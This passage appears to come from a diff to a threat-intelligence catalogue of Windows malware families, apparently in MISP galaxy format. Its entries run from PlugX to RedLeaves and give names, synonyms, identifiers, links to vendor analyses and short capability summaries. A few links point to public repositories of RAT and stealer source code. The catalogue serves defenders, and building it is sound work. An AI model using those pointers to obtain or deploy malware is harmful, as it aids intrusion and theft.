"https://www.rsa.com/content/dam/pdfs/2-2017/kingslayer-a-supply-chain-attack.pdf", + "http://blog.airbuscybersecurity.com/post/2014/01/plugx-some-uncovered-points.html", + "http://blog.jpcert.or.jp/2015/01/analysis-of-a-r-ff05.html", + "http://blog.jpcert.or.jp/2017/02/plugx-poison-iv-919a.html", + 
"http://blog.jpcert.or.jp/.s/2017/04/redleaves---malware-based-on-open-source-rat.html", + "https://www.arbornetworks.com/blog/asert/wp-content/uploads/2016/01/ASERT-Threat-Intelligence-Brief-2015-08-Uncovering-the-Seven-Point-Dagger.pdf", + "https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf", + "https://www.sophos.com/en-us/medialibrary/pdfs/technical%20papers/plugx-thenextgeneration.pdf", + "https://researchcenter.paloaltonetworks.com/2017/06/unit42-paranoid-plugx/", + "https://countuponsecurity.com/2018/02/04/malware-analysis-plugx/", + "https://countuponsecurity.com/2018/05/09/malware-analysis-plugx-part-2/", + "https://www.lac.co.jp/lacwatch/people/20171218_001445.html", + "https://blog.malwarebytes.com/threat-analysis/2016/08/unpacking-the-spyware-disguised-as-antivirus/", + "https://securelist.com/time-of-death-connected-medicine/84315/", + "https://community.rsa.com/thread/185439" + ] + }, + "uuid": "036bd099-fe80-46c2-9c4c-e5c6df8dcdee", + "value": "PlugX", + "description": "RSA describes PlugX as a RAT (Remote Access Trojan) malware family that is around since 2008 and is used as a backdoor to control the victim's machine fully. Once the device is infected, an attacker can remotely execute several kinds of commands on the affected system.\r\n\r\nNotable features of this malware family are the ability to execute commands on the affected machine to retrieve:\r\nmachine information\r\ncapture the screen\r\nsend keyboard and mouse events\r\nkeylogging\r\nreboot the system\r\nmanage processes (create, kill and enumerate)\r\nmanage services (create, start, stop, etc.); and\r\nmanage Windows registry entries, open a shell, etc.\r\n\r\nThe malware also logs its events in a text log file." 
+ }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.pngdowner", + "https://www.iocbucket.com/iocs/7f7999ab7f223409ea9ea10cff82b064ce2a1a31" + ] + }, + "uuid": "fb4313ea-1fb6-4766-8b5c-b41fd347e4c5", + "value": "pngdowner", + "description": "" + }, + { + "meta": { + "synonyms": [ + "pivy", + "poisonivy" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.poison_ivy", + "https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2017/august/analysing-a-recent-poison-ivy-sample/", + "https://researchcenter.paloaltonetworks.com/2016/04/unit42-new-poison-ivy-rat-variant-targets-hong-kong-pro-democracy-activists/", + "http://blog.fortinet.com/2017/08/23/deep-analysis-of-new-poison-ivy-variant", + "https://www.fireeye.com/blog/threat-research/2013/08/operation-molerats-middle-east-cyber-attacks-using-poison-ivy.html", + "https://blog.fortinet.com/2017/09/15/deep-analysis-of-new-poison-ivy-plugx-variant-part-ii", + "https://researchcenter.paloaltonetworks.com/2014/09/recent-watering-hole-attacks-attributed-apt-group-th3bug-using-poison-ivy/", + "https://github.com/CyberMonitor/APT_CyberCriminal_Campagin_Collections/blob/master/2016/2016.04.26.New_Poison_Ivy_Activity_Targeting_Myanmar_Asian_Countries/New%20Poison%20Ivy%20Activity%20Targeting%20Myanmar%2C%20Asian%20Countries.pdf", + "https://researchcenter.paloaltonetworks.com/2016/11/unit42-tropic-trooper-targets-taiwanese-government-and-fossil-fuel-provider-with-poison-ivy/" + ] + }, + "uuid": "7789fc1b-3cbc-4a1c-8ef0-8b06760f93e7", + "value": "Poison Ivy", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.polyglot_ransom", + "https://securelist.com/blog/research/76182/polyglot-the-fake-ctb-locker/" + ] + }, + "uuid": "5ee77368-5e09-4016-ae73-82b99e830832", + "value": "Polyglot", + "description": "" + }, + { + "meta": { + 
"synonyms": [ + "Siplog", + "Fareit" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.pony", + "https://www.mcafee.com/us/resources/reports/rp-quarterly-threats-jun-2017.pdf", + "https://www.uperesia.com/analysis-of-a-packed-pony-downloader", + "https://github.com/nyx0/Pony" + ] + }, + "uuid": "cd201689-4bf1-4c5b-ac4d-21c4dcc39e7d", + "value": "Pony", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.poohmilk", + "https://researchcenter.paloaltonetworks.com/2017/10/unit42-freemilk-highly-targeted-spear-phishing-campaign/", + "http://blog.talosintelligence.com/2018/01/korea-in-crosshairs.html" + ] + }, + "uuid": "54327cbd-d30c-4684-9a66-18ae36b28399", + "value": "PoohMilk Loader", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.popcorn_time", + "https://twitter.com/malwrhunterteam/status/806595092177965058" + ] + }, + "uuid": "4ceebc38-f50b-4817-930f-c954d203ff7b", + "value": "Popcorn Time", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.portless", + "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/20134508/winnti-more-than-just-a-game-130410.pdf" + ] + }, + "uuid": "b813cb80-28ff-4713-abdc-e9a22d397bb4", + "value": "portless", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.poscardstealer", + "http://pages.arbornetworks.com/rs/arbor/images/ASERT%20Threat%20Intelligence%20Brief%202014-06%20Uncovering%20PoS%20Malware%20and%20Attack%20Campaigns.pdf" + ] + }, + "uuid": "5fa166d1-128b-4057-87e3-6676b7d9a7d7", + "value": "poscardstealer", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + 
"https://malpedia.caad.fkie.fraunhofer.de/details/win.poweliks_dropper", + "https://www.zscaler.com/blogs/research/malvertising-targeting-european-transit-users" + ] + }, + "uuid": "782bee33-9f8d-41df-a608-c014bd6a7de1", + "value": "Poweliks Dropper", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.powerduke", + "https://www.volexity.com/blog/2016/11/09/powerduke-post-election-spear-phishing-campaigns-targeting-think-tanks-and-ngos/" + ] + }, + "uuid": "c79f5876-e3b9-417a-8eaf-8f1b01a0fecd", + "value": "PowerDuke", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.powerpool", + "https://www.welivesecurity.com/2018/09/05/powerpool-malware-exploits-zero-day-vulnerability/" + ] + }, + "uuid": "02e5196e-f7ac-490a-9a92-d4865740016b", + "value": "PowerPool", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.powersniff", + "https://lokalhost.pl/gozi_tree.txt" + ] + }, + "uuid": "519d07f5-bea3-4360-8aa5-f9fcdb79cb52", + "value": "Powersniff", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.power_ratankba", + "https://www.riskiq.com/blog/labs/lazarus-group-cryptocurrency/", + "https://blog.trendmicro.com/trendlabs-security-intelligence/lazarus-campaign-targeting-cryptocurrencies-reveals-remote-controller-tool-evolved-ratankba/", + "https://www.proofpoint.com/sites/default/files/pfpt-us-wp-north-korea-bitten-by-bitcoin-bug.pdf" + ] + }, + "uuid": "606f778a-8b99-4880-8da8-b923651d627b", + "value": "PowerRatankba", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.prb_backdoor", + 
"https://sec0wn.blogspot.com/2018/05/prb-backdoor-fully-loaded-powershell.html" + ] + }, + "uuid": "2c9c42bc-8f26-4122-9454-a7eed8cd8886", + "value": "prb_backdoor", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.prikormka", + "https://www.welivesecurity.com/wp-content/uploads/2016/05/Operation-Groundbait.pdf" + ] + }, + "uuid": "00764634-4a21-4c5c-8b1f-fb294c9bdd3f", + "value": "Prikorma", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.prilex", + "https://blog.trendmicro.com/trendlabs-security-intelligence/dissecting-prilex-cutlet-maker-atm-malware-families/", + "https://www.kaspersky.com/blog/chip-n-pin-cloning/21502" + ] + }, + "uuid": "a0899fec-161d-4ba8-9594-8b5620c21705", + "value": "Prilex", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.princess_locker", + "https://blog.malwarebytes.com/threat-analysis/2016/11/princess-ransomware/", + "https://hshrzd.wordpress.com/2016/11/17/princess-locker-decryptor/", + "https://www.bleepingcomputer.com/news/security/introducing-her-royal-highness-the-princess-locker-ransomware/" + ] + }, + "uuid": "0714a7ad-45cb-44ec-92f9-2e839fd8a6b8", + "value": "PrincessLocker", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.psix", + "https://twitter.com/mesa_matt/status/1035211747957923840" + ] + }, + "uuid": "416ae41e-17b2-46f6-847b-2831a0b3f8e9", + "value": "PsiX", + "description": "According to Matthew Mesa, this is a modular bot. 
The name stems from the string PsiXMainModule in binaries until mid of September 2018.\r\n\r\nIn binaries, apart from BotModule and MainModule, references to the following Modules have be observed:\r\nBrowserModule\r\nBTCModule\r\nComplexModule\r\nKeyLoggerModule\r\nOutlookModule\r\nProcessModule\r\nRansomwareModule\r\nSkypeModule" + }, + { + "meta": { + "synonyms": [ + "PSS" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.pss", + "https://citizenlab.ca/2017/12/champing-cyberbit-ethiopian-dissidents-targeted-commercial-spyware/" + ] + }, + "uuid": "e437f01c-8040-4098-a3fa-20154b58c928", + "value": "PC Surveillance System", + "description": "Citizenlab notes that PC Surveillance System (PSS) is a commercial spyware product offered by Cyberbit and marketed to intelligence and law enforcement agencies." + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.pteranodon", + "https://researchcenter.paloaltonetworks.com/2017/02/unit-42-title-gamaredon-group-toolset-evolution/" + ] + }, + "uuid": "d5138738-846e-4466-830c-cd2bb6ad09cf", + "value": "Pteranodon", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.pubnubrat", + "http://blog.alyac.co.kr/1853", + "https://blog.talosintelligence.com/2018/04/fake-av-investigation-unearths-kevdroid.html" + ] + }, + "uuid": "bcc8e3ef-fc5e-4d44-9011-4d429bac0f26", + "value": "PubNubRAT", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.punkey_pos", + "https://www.trustwave.com/Resources/SpiderLabs-Blog/New-POS-Malware-Emerges---Punkey/", + "https://www.pandasecurity.com/mediacenter/malware/punkeypos/" + ] + }, + "uuid": "57a6dbce-2d8a-44ae-a561-282d02935698", + "value": "Punkey POS", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": 
[], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.pupy", + "https://github.com/n1nj4sec/pupy", + "https://researchcenter.paloaltonetworks.com/2017/02/unit42-magic-hound-campaign-attacks-saudi-targets/", + "https://blog.cyber4sight.com/2017/02/malicious-powershell-script-analysis-indicates-shamoon-actors-used-pupy-rat/", + "https://www.secureworks.com/blog/iranian-pupyrat-bites-middle-eastern-organizations" + ] + }, + "uuid": "8a789016-5f8d-4cd9-ba96-ba253db42fd8", + "value": "pupy", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.pushdo", + "https://www.secureworks.com/research/pushdo", + "https://www.trendmicro.de/cloud-content/us/pdfs/business/white-papers/wp_study-of-pushdo-cutwail-botnet.pdf", + "http://malware-traffic-analysis.net/2017/04/03/index2.html", + "https://www.blueliv.com/research/tracking-the-footproints-of-pushdo-trojan/" + ] + }, + "uuid": "b39ffc73-db5f-4a8a-acd2-bee958d69155", + "value": "Pushdo", + "description": "Pushdo is usually classified as a \"downloader\" trojan - meaning its true purpose is to download and install additional malicious software. There are dozens of downloader trojan families out there, but Pushdo is actually more sophisticated than most, but that sophistication lies in the Pushdo control server rather than the trojan." 
+ }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.putabmow" + ] + }, + "uuid": "b0cb81bc-5d97-454a-8eee-4e81328c7228", + "value": "Putabmow", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.pvzout", + "https://www.cylance.com/content/dam/cylance/pages/operation-cleaver/Cylance_Operation_Cleaver_Report.pdf" + ] + }, + "uuid": "52932caa-2fac-4eeb-88de-b3e143db010e", + "value": "PvzOut", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.pwnpos", + "https://blog.trendmicro.com/trendlabs-security-intelligence/pwnpos-old-undetected-pos-malware-still-causing-havoc/", + "https://www.brimorlabsblog.com/2015/03/and-you-get-pos-malware-nameand-you-get.html", + "https://twitter.com/physicaldrive0/status/573109512145649664" + ] + }, + "uuid": "c903627c-90f6-44ee-9750-4bb44bdbceab", + "value": "pwnpos", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.pykspa", + "https://www.johannesbader.ch/2015/03/the-dga-of-pykspa/", + "https://www.johannesbader.ch/2015/07/pykspas-inferior-dga-version/", + "https://www.youtube.com/watch?v=HfSQlC76_s4" + ] + }, + "uuid": "3f0e7db1-5944-4137-89d1-d36940f596d2", + "value": "Pykspa", + "description": "" + }, + { + "meta": { + "synonyms": [ + "Locky Locker" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.pylocky", + "https://sensorstechforum.com/lockymap-files-virus-pylocky-ransomware-remove-restore-data/", + "https://www.cert.ssi.gouv.fr/alerte/CERTFR-2018-ALE-008/", + "https://blog.trendmicro.com/trendlabs-security-intelligence/a-closer-look-at-the-locky-poser-pylocky-ransomware/" + ] + }, + "uuid": "3a5775d3-7d4a-4795-b1b1-7a340030d490", + "value": "PyLocky", + 
"description": "PyLocky is a ransomware that tries to pass off as Locky in its ransom note. It is written in Python and packaged with PyInstaller." + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.qaccel" + ] + }, + "uuid": "f4980a75-f72c-4925-8ff5-118b32dd5eaa", + "value": "Qaccel", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.qadars", + "https://info.phishlabs.com/blog/dissecting-the-qadars-banking-trojan", + "https://www.johannesbader.ch/2016/04/the-dga-of-qadars/", + "https://securityintelligence.com/an-analysis-of-the-qadars-trojan/", + "https://securityintelligence.com/meanwhile-britain-qadars-v3-hardens-evasion-targets-18-uk-banks/", + "https://www.welivesecurity.com/2013/12/18/qadars-a-banking-trojan-with-the-netherlands-in-its-sights/", + "https://pages.phishlabs.com/rs/130-BFB-942/images/Qadars%20-%20Final.pdf" + ] + }, + "uuid": "080b2071-2d69-4b76-962e-3d0142074bcb", + "value": "Qadars", + "description": "" + }, + { + "meta": { + "synonyms": [ + "Qbot", + "Pinkslipbot" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.qakbot", + "https://www.johannesbader.ch/2016/02/the-dga-of-qakbot/", + "https://www.cylance.com/en_us/blog/threat-spotlight-the-return-of-qakbot-malware.html", + "https://media.scmagazine.com/documents/225/bae_qbot_report_56053.pdf", + "https://securityintelligence.com/qakbot-banking-trojan-causes-massive-active-directory-lockouts/", + "https://www.virusbulletin.com/uploads/pdf/magazine/2016/VB2016-Karve-etal.pdf", + "http://contagiodump.blogspot.com/2010/11/template.html", + "http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/w32_qakbot_in_detail.pdf", + "https://www.vkremez.com/2018/07/lets-learn-in-depth-reversing-of-qakbot.html" + ] + }, + "uuid": "2ccaccd0-8362-4224-8497-2012e7cc7549", + "value": 
"QakBot", + "description": "" + }, + { + "meta": { + "synonyms": [ + "Tolouge" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.qhost" + ] + }, + "uuid": "28f35535-dd40-4ee2-8064-5acbe76d8d4c", + "value": "QHost", + "description": "" + }, + { + "meta": { + "synonyms": [ + "qtproject" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.qtbot", + "https://researchcenter.paloaltonetworks.com/2017/11/unit42-everybody-gets-one-qtbot-used-distribute-trickbot-locky/" + ] + }, + "uuid": "e8240391-3e3d-4894-ba80-f8e8de8a8222", + "value": "QtBot", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.quant_loader", + "https://malwarebreakdown.com/2017/10/10/malvertising-campaign-uses-rig-ek-to-drop-quant-loader-which-downloads-formbook/", + "https://blog.trendmicro.com/trendlabs-security-intelligence/necurs-evolves-to-evade-spam-detection-via-internet-shortcut-file/", + "https://blog.malwarebytes.com/threat-analysis/2018/03/an-in-depth-malware-analysis-of-quantloader/", + "https://www.proofpoint.com/us/threat-insight/post/leaked-source-code-ammyy-admin-turned-flawedammyy-rat", + "https://blogs.forcepoint.com/security-labs/locky-distributor-uses-newly-released-quant-loader-sold-russian-underground" + ] + }, + "uuid": "e6005ce5-3e3d-4dfb-8de7-3da45e89e549", + "value": "Quant Loader", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.quasar_rat", + "https://researchcenter.paloaltonetworks.com/2018/01/unit42-vermin-quasar-rat-custom-malware-used-ukraine/", + "https://github.com/quasar/QuasarRAT/tree/master/Client", + "https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf", + "https://documents.trendmicro.com/assets/tech-brief-untangling-the-patchwork-cyberespionage-group.pdf?platform=hootsuite", + 
"https://ti.360.net/blog/articles/analysis-of-apt-c-09-target-china/", + "https://twitter.com/malwrhunterteam/status/789153556255342596", + "http://researchcenter.paloaltonetworks.com/2017/01/unit42-downeks-and-quasar-rat-used-in-recent-targeted-attacks-against-governments", + "https://www.volexity.com/blog/2018/06/07/patchwork-apt-group-targets-us-think-tanks/", + "https://www.welivesecurity.com/2018/07/17/deep-dive-vermin-rathole/", + "https://researchcenter.paloaltonetworks.com/2018/08/unit42-gorgon-group-slithering-nation-state-cybercrime/" + ] + }, + "uuid": "05252643-093b-4070-b62f-d5836683a9fa", + "value": "Quasar RAT", + "description": "Quasar RAT is a malware family written in .NET which is used by a variety of attackers. The malware is fully functional and open source, and is often packed to make analysis of the source more difficult." + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.r980", + "https://otx.alienvault.com/pulse/57976b52b900fe01376feb01/" + ] + }, + "uuid": "06f63e6b-d177-4e21-b432-e3a219bc0965", + "value": "r980", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.radamant", + "https://www.cyphort.com/radamant-ransomware-distributed-via-rig-ek/" + ] + }, + "uuid": "98bcb2b9-bc3a-4ffb-859a-94bd03c1cc3c", + "value": "Radamant", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.radrat", + "https://labs.bitdefender.com/2018/04/radrat-an-all-in-one-toolkit-for-complex-espionage-ops/" + ] + }, + "uuid": "271752e3-67ca-48bc-ade2-30eec11defca", + "value": "RadRAT", + "description": "" + }, + { + "meta": { + "synonyms": [ + "brebsd" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.rambo", + 
"https://www.morphick.com/resources/news/deep-dive-dragonok-rambo-backdoor"
+ ]
+ },
+ "uuid": "805b99d1-233d-4f7f-b343-440e5d507494",
+ "value": "Rambo",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.ramdo"
+ ]
+ },
+ "uuid": "51f53823-d289-4176-af45-3fca7eda824b",
+ "value": "Ramdo",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [
+ "Nimnul"
+ ],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.ramnit",
+ "https://malwarebreakdown.com/2017/08/23/the-seamless-campaign-isnt-losing-any-steam/",
+ "https://www.cert.pl/en/news/single/ramnit-in-depth-analysis/",
+ "http://www.nao-sec.org/2018/01/analyzing-ramnit-used-in-seamless.html",
+ "https://www.symantec.com/content/dam/symantec/docs/security-center/white-papers/w32-ramnit-analysis-15-en.pdf",
+ "http://www.vkremez.com/2018/02/deeper-dive-into-ramnit-banker-vnc-ifsb.html",
+ "http://contagiodump.blogspot.com/2012/01/blackhole-ramnit-samples-and-analysis.html",
+ "https://research.checkpoint.com/ramnits-network-proxy-servers/"
+ ]
+ },
+ "uuid": "542161c0-47a4-4297-baca-5ed98386d228",
+ "value": "Ramnit",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.ranbyus",
+ "https://www.johannesbader.ch/2015/05/the-dga-of-ranbyus/",
+ "http://www.xylibox.com/2013/01/trojanwin32spyranbyus.html",
+ "https://www.welivesecurity.com/2012/12/19/win32spy-ranbyus-modifying-java-code-in-rbs/",
+ "https://www.welivesecurity.com/2012/06/05/smartcard-vulnerabilities-in-modern-banking-malware/"
+ ]
+ },
+ "uuid": "5d9a27e7-3110-470a-ac0d-2bf00cac7846",
+ "value": "Ranbyus",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.ranscam",
+ "http://blog.talosintel.com/2016/07/ranscam.html"
+ ]
+ },
+ "uuid": 
"50c92b0b-cae3-41e7-b7d8-dffc2c88ac4b",
+ "value": "Ranscam",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.ransoc",
+ "https://www.proofpoint.com/us/threat-insight/post/ransoc-desktop-locking-ransomware-ransacks-local-files-social-media-profiles"
+ ]
+ },
+ "uuid": "5310903e-0704-4ca4-ab1b-52d243dddb06",
+ "value": "Ransoc",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [
+ "WinLock"
+ ],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.ransomlock",
+ "https://www.symantec.com/security_response/writeup.jsp?docid=2012-022215-2340-99&tabid=2",
+ "https://forum.malekal.com/viewtopic.php?t=36485&start="
+ ]
+ },
+ "uuid": "3e47c926-eea3-4fba-915a-1f3c5b92a94c",
+ "value": "Ransomlock",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.rapid_ransom",
+ "https://twitter.com/malwrhunterteam/status/977275481765613569",
+ "https://twitter.com/malwrhunterteam/status/997748495888076800"
+ ]
+ },
+ "uuid": "06929ad3-2a00-4212-b171-9ecb5f956af5",
+ "value": "Rapid Ransom",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.rapid_stealer",
+ "http://pwc.blogs.com/cyber_security_updates/2014/09/malware-microevolution.html"
+ ]
+ },
+ "uuid": "bc1fc21d-80c0-4629-bb18-d5ae1df2a431",
+ "value": "RapidStealer",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.rarstar",
+ "https://www.secureworks.com/research/bronze-butler-targets-japanese-businesses"
+ ]
+ },
+ "uuid": "e0a1407f-2595-4bd2-ba16-2c6d9be4e066",
+ "value": "rarstar",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ 
"https://malpedia.caad.fkie.fraunhofer.de/details/win.ratabankapos",
+ "https://www.proofpoint.com/sites/default/files/pfpt-us-wp-north-korea-bitten-by-bitcoin-bug.pdf",
+ "http://blog.trex.re.kr/3"
+ ]
+ },
+ "uuid": "15b85bac-c58b-41fd-8332-cfac7c445e0d",
+ "value": "RatabankaPOS",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.rawpos",
+ "https://threatvector.cylance.com/en_us/home/rawpos-malware.html",
+ "http://blog.trendmicro.com/trendlabs-security-intelligence/rawpos-new-behavior-risks-identity-theft/?platform=hootsuite"
+ ]
+ },
+ "uuid": "80f87001-ff40-4e33-bd12-12ed1a92d1d7",
+ "value": "RawPOS",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [
+ "Remote Control System",
+ "Crisis"
+ ],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.rcs",
+ "https://www.f-secure.com/documents/996508/1030745/callisto-group",
+ "https://www.welivesecurity.com/2018/03/09/new-traces-hacking-team-wild/"
+ ]
+ },
+ "uuid": "c359c74e-4155-4e66-a344-b56947f75119",
+ "value": "RCS",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.rdasrv",
+ "https://www.wired.com/wp-content/uploads/2014/09/wp-pos-ram-scraper-malware.pdf"
+ ]
+ },
+ "uuid": "1bf3469a-b9c8-497a-bcbb-b1095386706a",
+ "value": "rdasrv",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.reactorbot",
+ "http://www.malwaredigger.com/2015/05/rovnix-dropper-analysis.html",
+ "http://www.malwaredigger.com/2015/06/rovnix-payload-and-plugin-analysis.html",
+ "http://blog.trendmicro.com/trendlabs-security-intelligence/rovnix-infects-systems-with-password-protected-macros/",
+ "https://www.symantec.com/connect/blogs/new-carberp-variant-heads-down-under"
+ ]
+ },
+ "uuid": "9d58d94f-6885-4a38-b086-b9978ac62c1f",
+ 
"value": "ReactorBot",
+ "description": "Please note: ReactorBot in its naming is often mistakenly labeled as Rovnix. ReactorBot is a full blown bot with modules, whereas Rovnix is just a bootkit / driver component (originating from Carberp), occasionally delivered alongside ReactorBot."
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.reaver",
+ "https://researchcenter.paloaltonetworks.com/2017/11/unit42-new-malware-with-ties-to-sunorcal-discovered/"
+ ]
+ },
+ "uuid": "826c31ca-2617-47e4-b236-205da3881182",
+ "value": "Reaver",
+ "description": "Reaver is a type of malware discovered by researchers at Palo Alto Networks in November 2017, but its activity dates back to at least late 2016. Researchers identified only ten unique samples of the malware, indicating limited use, and three different variants, noted as versions 1, 2, and 3. The malware is unique as its final payload masquerades as a control panel link (CPL) file. The intended targets of this activity are unknown as of this writing; however, it was used concurrently with the SunOrcal malware and the same C2 infrastructure used by threat actors who primarily target based on the \"Five Poisons\" - five perceived threats deemed dangerous to, and working against the interests of, the Chinese government." 
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.redalpha",
+ "https://www.recordedfuture.com/redalpha-cyber-campaigns/"
+ ]
+ },
+ "uuid": "6be9eee4-ee99-4ad6-bee3-2365d7b37a88",
+ "value": "RedAlpha",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.redleaves",
+ "http://blog.macnica.net/blog/2017/12/post-8c22.html",
+ "https://www.accenture.com/t20180423T055005Z__w__/se-en/_acnmedia/PDF-76/Accenture-Hogfish-Threat-Analysis.pdf",
+ "http://blog.jpcert.or.jp/.s/2017/04/redleaves---malware-based-on-open-source-rat.html",
+ "https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf",
+ "https://github.com/nccgroup/Cyber-Defence/tree/master/Technical%20Notes/Red%20Leaves",
+ "https://www.jpcert.or.jp/magazine/acreport-redleaves.html"
+ ]
+ },
